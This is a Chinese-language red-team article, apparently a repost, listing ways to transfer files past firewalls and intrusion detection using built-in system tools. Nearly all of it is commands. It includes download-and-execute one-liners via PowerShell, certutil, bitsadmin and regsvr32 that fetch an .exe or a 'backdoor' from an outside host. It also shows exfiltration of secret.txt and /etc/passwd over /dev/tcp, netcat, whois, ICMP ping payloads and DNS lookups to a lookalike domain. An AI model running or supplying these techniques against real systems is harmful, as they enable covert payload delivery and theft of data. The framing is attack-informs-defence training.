红蓝对抗--蓝军套路之利用系统工具进行文件传输
在進行紅藍對抗演練時,藍軍常常需要最大化利用當(dāng)前的環(huán)境繞過重兵防守的系統(tǒng)的防火墻、IDS、IPS等報警和監(jiān)控系統(tǒng)進行文件傳輸。關(guān)鍵時刻,如何繞過這些防護進行文件傳輸,就成了藍軍攻擊檢測中的重要一步。
道高一尺,魔高一丈。今天就來擺一下利用操作系統(tǒng)默認(rèn)自帶工具進行文件傳輸?shù)恼_姿勢。
一、搭建HTTP Server
● Python
python2:
python -m SimpleHTTPServer 1337
以上命令會在當(dāng)前目錄啟動 HTTP 服務(wù),端口為 1337
python3:
python -m http.server 1337
以上命令會在當(dāng)前目錄啟動 HTTP 服務(wù),端口為 1337
● PHP 5.4+
當(dāng) PHP 版本大于 5.4 是,可使用 PHP 在當(dāng)前目錄啟動 HTTP 服務(wù),端口為 1337
php -S 0.0.0.0:1337
● Ruby
下面的命令會在當(dāng)前目錄下啟動 HTTP 服務(wù),端口為 1337
ruby -rwebrick -e'WEBrick::HTTPServer.new(:Port => 1337, :DocumentRoot => Dir.pwd).start'● Ruby 1.9.2+
ruby -run -e httpd . -p 1337● Perl
perl -MHTTP::Server::Brick -e '$s=HTTP::Server::Brick->new(port=>1337); $s->mount("/"=>{path=>"."}); $s->start' perl -MIO::All -e 'io(":8080")->fork->accept->(sub { $_[0] < io(-x $1 +? "./$1 |" : $1) if /^GET \/(.*) / })'● busybox httpd
busybox httpd -f -p 8000二、從 HTTP Server 下載文件
以下列出了在 Windows 和 Linux 系統(tǒng)下使用系統(tǒng)自帶工具從 HTTP Server 下載文件的幾種方法
● Windows
powershell
下載并執(zhí)行:
powershell (new-object System.Net.WebClient).DownloadFile(‘http://1.2.3.4/5.exe’,'c:\download\a.exe’);start-process ‘c:\download\a.exe’
certutil
下載并執(zhí)行:
certutil -urlcache -split -f http://1.2.3.4/5.exe c:\download\a.exe&&c:\download\a.exe
bitsadmin
下載并執(zhí)行:
bitsadmin /transfer n http://1.2.3.4/5.exe c:\download\a.exe && c:\download\a.exe
bitsadmin 的下載速度比較慢
regsvr32
regsvr32 /u /s /i:http://1.2.3.4/5.exe scrobj.dll
● Linux
Curl
curl http://1.2.3.4/backdoor
Wget
wget http://1.2.3.4/backdoor
awk
在使用 awk 進行下載文件時,首先使用以上列出的任意一條命令啟動一個 HTTP Server
awk 'BEGIN {RS = ORS = "\r\n"HTTPCon = "/inet/tcp/0/127.0.0.1/1337"print "GET /secret.txt HTTP/1.1\r\nConnection: close\r\n" |& HTTPConwhile (HTTPCon |& getline > 0)print $0close(HTTPCon) }'效果:
三、Setup HTTP PUT Server
以下列出了上傳文件到 HTTP Server 的幾種方法
● 使用 Nginx 搭建 HTTP PUT Server
mkdir -p /var/www/upload/ # 創(chuàng)建目錄
chown www-data:www-data /var/www/upload/ # 修改目錄所屬用戶和組
cd /etc/nginx/sites-available # 進入 nginx 虛擬主機目錄
#寫入配置到 file_upload 文件 cat <<EOF > file_upload server {listen 8001 default_server;server_name kali;location / {root /var/www/upload;dav_methods PUT;} } EOF #寫入完畢cd …/sites-enable # 進入 nginx 虛擬主機啟動目錄
ln -s /etc/nginx/sites-available/file_upload file_upload # 啟用 file_upload 虛擬主機
systemctl start nginx # 啟動 Nginx
● 使用 Python 搭建 HTTP PUT Server
以下代碼保存到 HTTPutServer.py 文件里:
https://www.snip2code.com/Snippet/905666/Python-HTTP-PUT-test-server import sys import signal from threading import Thread from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandlerclass PUTHandler(BaseHTTPRequestHandler):def do_PUT(self):length = int(self.headers['Content-Length'])content = self.rfile.read(length)self.send_response(200)with open(self.path[1:], "w") as f:f.write(content)def run_on(port):print("Starting a HTTP PUT Server on {0} port {1} (http://{0}:{1}) ...".format(sys.argv[1], port))server_address = (sys.argv[1], port)httpd = HTTPServer(server_address, PUTHandler)httpd.serve_forever()if __name__ == "__main__":if len(sys.argv) < 3:print("Usage:\n\tpython {0} ip 1337".format(sys.argv[0]))sys.exit(1)ports = [int(arg) for arg in sys.argv[2:]]try:for port_number in ports:server = Thread(target=run_on, args=[port_number])server.daemon = True # Do not make us wait for you to exitserver.start()signal.pause() # Wait for interrupt signal, e.g. KeyboardInterruptexcept KeyboardInterrupt:print "\nPython HTTP PUT Server Stoped."sys.exit(1)運行方法:
$ python HTTPutServer.py 10.10.10.100 1337 Starting a HTTP PUT Server on 10.10.10.100 port 1337 (http://10.10.10.100:1337) ...四、上傳文件到 HTTP PUT server
● Linux
Curl $ curl --upload-file secret.txt http://ip:port/ Wget $ wget --method=PUT --post-file=secret.txt http://ip:port/● Windows
Powershell $body = Get-Content secret.txt Invoke-RestMethod -Uri http://ip:port/secret.txt -Method PUT -Body $body五、使用 Bash /dev/tcp 進行文件傳輸
首先需要監(jiān)聽端口
文件接收端:
nc -lvnp 1337 > secret.txt
文件發(fā)送端:
cat secret.txt > /dev/tcp/ip/port
六、使用 SMB 協(xié)議進行文件傳輸
● 搭建簡易 SMB Server
搭建簡易SMB Server 需要用到 Impacket 項目的 smbserver.py 文件
Impacket 已默認(rèn)安裝在 Kali Linux 系統(tǒng)中
syntax: impacker-smbserver ShareName SharePath
$ mkdir smb # 創(chuàng)建 smb 目錄
$ cd smb # 進入 smb目錄
$ impacket-smbserver share pwd # 在當(dāng)前目錄啟動 SMB server,共享名稱為 share
效果:
從 SMB server 下載文件
copy \IP\ShareName\file.exe file.exe
上傳文件到 SMB server
net use x: \IP\ShareName
copy file.txt x:
net use x: /delete
● 使用 whois 命令進行文件傳輸
/etc/passwdHost A
Host B
接收端 Host B:
nc -vlnp 1337 | sed “s/ //g” | base64 -d
發(fā)送端 Host A:
whois -h 127.0.0.1 -p 1337 cat /etc/passwd | base64
效果:
● 使用 ping 命令進行文件傳輸
secret.txtSender
Reciver
發(fā)送端:
xxd -p -c 4 secret.txt | while read line; do ping -c 1 -p $line ip; done
接收端:
以下代碼保存到 ping_receiver.py
import sys
try:from scapy.all import * except:print("Scapy not found, please install scapy: pip install scapy")sys.exit(0)def process_packet(pkt):if pkt.haslayer(ICMP):if pkt[ICMP].type == 8:data = pkt[ICMP].load[-4:]print(f'{data.decode("utf-8")}', flush=True, end="", sep="")sniff(iface="eth0", prn=process_packet)執(zhí)行方法:
python3 ping_receiver.py
效果
● 使用 dig 命令進行文件傳輸
/etc/passwdSender
Reciver
發(fā)送端:
xxd -p -c 31 /etc/passwd | while read line; do dig @172.16.1.100 +short +tries=1 +time=1 $line.gooogle.com; done
接收端:
以下代碼使用了 python 的 scapy 模塊,需要手動安裝
代碼保存到 dns_reciver.py 文件中
運行方法:
python3 dns_reciver.py
效果:
七、使用 NetCat 進行文件傳輸
1.txtA:10.10.10.100
B:10.10.10.200
接受端:
nc -l -p 1337 > 1.txt
發(fā)送端:
cat 1.txt | nc -l -p 1337
或者
nc 10.10.10.200 1337 < 1.txt
在極端環(huán)境下,如果接受端沒有 nc 可以使用 Bash 的 /dev/tcp 接收文件:
cat < /dev/tcp/10.10.10.200/1337 > 1.txt
近年來,隨著互聯(lián)網(wǎng)快速發(fā)展,網(wǎng)絡(luò)攻擊、信息泄露等問題也日益突出。這對公共網(wǎng)絡(luò)安全、信息安全造成嚴(yán)重威脅。知道創(chuàng)宇提出了“未知攻、焉知防”的安全理念,這同樣也是對抗演習(xí)的核心思想,以攻促防,全面了解企業(yè)安全防護的優(yōu)劣勢,提升安全人員的安全技能和防護水平。
總結(jié)
以上是生活随笔為你收集整理的红蓝对抗--蓝军套路之利用系统工具进行文件传输的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 托福字典:progressively托福
- 下一篇: java信息管理系统总结_java实现科